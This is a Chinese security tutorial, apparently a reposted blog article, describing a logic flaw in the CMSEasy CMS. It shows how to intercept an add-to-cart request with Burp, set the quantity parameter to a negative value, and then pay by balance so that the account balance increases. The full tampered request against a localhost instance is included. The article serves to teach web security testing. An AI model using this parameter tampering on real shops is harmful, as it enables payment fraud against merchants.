CMSEASY逻辑漏洞思路剖析

  • A+
所属分类:安全文章

本周分享知识星球里面的cmseasy逻辑漏洞,里面涉及了抓包教程比较简单,适合新手练习。这次跟大家分享其中的思路。

本文作者:付聪(MS08067安全实验室核心)




CMSEASY逻辑漏洞




登录任意账户:


CMSEASY逻辑漏洞思路剖析

点击任意产品: 


CMSEASY逻辑漏洞思路剖析


点击任意一个产品,前提是有余量:


CMSEASY逻辑漏洞思路剖析


输入任意正常数量,burp开启抓包,点击添加购物车:


CMSEASY逻辑漏洞思路剖析


将抓到的包中的最后一个数字改成负数:


CMSEASY逻辑漏洞思路剖析


CMSEASY逻辑漏洞思路剖析


然后放包


GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1Host: localhostAccept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0Referer: http://localhost/index.php?case=archive&act=show&aid=527Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoNConnection: close


此时可以看到购物车中为负数:


CMSEASY逻辑漏洞思路剖析

查看个人中心中的余额,为5600:


CMSEASY逻辑漏洞思路剖析

点击购物车:


CMSEASY逻辑漏洞思路剖析

点击下图内容:


CMSEASY逻辑漏洞思路剖析

填写完成之后,点击在线支付:


CMSEASY逻辑漏洞思路剖析


十一

选择余额支付,点击购买:


CMSEASY逻辑漏洞思路剖析

十二

购买成功:


CMSEASY逻辑漏洞思路剖析

十三

回到个人中心,可以看到余额的变化:


CMSEASY逻辑漏洞思路剖析







扫描下方二维码加入WEB安全星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

CMSEASY逻辑漏洞思路剖析

目前25000+人已关注加入我们

CMSEASY逻辑漏洞思路剖析

本文始发于微信公众号(Ms08067安全实验室):CMSEASY逻辑漏洞思路剖析

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: